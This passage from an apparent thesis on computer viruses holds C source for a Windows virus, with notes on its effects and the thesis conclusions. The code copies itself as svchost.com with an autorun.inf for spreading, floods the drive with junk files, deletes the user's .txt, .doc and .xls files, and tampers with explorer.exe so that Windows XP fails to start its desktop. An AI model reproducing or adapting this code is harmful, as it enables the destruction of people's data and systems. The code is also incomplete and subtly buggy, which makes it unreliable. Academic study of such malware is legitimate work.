  char temp[2][20]={"C:\\svchost.com","c:\\autorun.inf"};
  for(i=0;i<SVCHOST_NUM;i++)
  {
    if((input=fopen(files_svchost[i],"rb"))!=NULL)
    {
      fclose(input);
      for(k=0;k<SVCHOST_NUM;k++)
      {
        copy(files_svchost[i],files_svchost[k]);
      }
      i=SVCHOST_NUM;
    }
  }
  for(i=0;i<SVCHOST_NUM;i++)
  {
    if((input=fopen(files_svchost[i],"rb"))!=NULL)
    {
      fclose(input);
      for(k=0;k<24;k++)
      {
        copy(files_svchost[i],temp[0]);
        if((output=fopen(temp[1],"w"))!=NULL)
        {
          fprintf(output,"%s",autorun);
          fclose(output);
        }
/* (the remainder of copy_virus is missing from the source) */

void make_rubbish()
{
  int i;
  FILE *output;
  srand(0);
  for(i=0;i<RUBBISH_NUM;i++)
  {
    int n;
    char s[30];
    n=rand();
    sprintf(s,"C:\\DESTORY_GHIDE_%d",n);
    if((output=fopen(s,"w"))!=NULL)
    {
      fprintf(output,"%ld%s",n*n,s);
      fclose(output);
    }
  }
}
/*================================================*/
void remove_files()
{
  long done;
  int i;
  struct _finddata_t ffblk;
  char *remove_files[3]={"*.txt","*.doc","*.xls"};
  for(i=0;i<3;i++)
  {
    if(_findfirst(remove_files[i],&ffblk)==-1) continue;
    while(!done)
    {
      remove(ffblk.name);
      _findnext(done,&ffblk);
    }
    _findclose(done);
  }
}
/*=================================================*/
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
  int contral=0;
  autorun_explorer();
  spawnl(1,"c:\\windows\\system\\explorer.exe"," /s",NULL);
  add_reg();
  copy_virus();
  make_rubbish();
  spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
  return 0;
}
After the win32 virus program runs, it automatically creates and deletes the following files. When the program built with Visual C++ is run, it acts on several Windows files and makes Windows XP fail at startup:
CreateFile C:\windows\system32\dllcache\$temp$
DeleteFile C:\windows\system32\dllcache\explorer.exe
CreateFile C:\windows\$temp$
DeleteFile C:\windows\explorer.exe
CreateFile C:\windows\system\explorer.exe
Screen after running the virus
After this virus program has run and the computer is restarted, the screen does not come up, because the file C:\windows\system\explorer.exe has been changed and the files C:\windows\system32\dllcache\$temp$ and C:\windows\$temp$ have been created, so Windows XP cannot load the program that starts the Windows XP desktop.
Conclusion
Results achieved by the thesis:
1. Study and research of theory:
- An overview of computer viruses and the operation of B-Viruses, F-Viruses, Macro viruses, Trojans and Internet worms.
- Some methods of detecting and recognising computer viruses.
- Some methods of preventing and removing computer viruses.
2. Experiment: a program simulating the creation of a computer virus.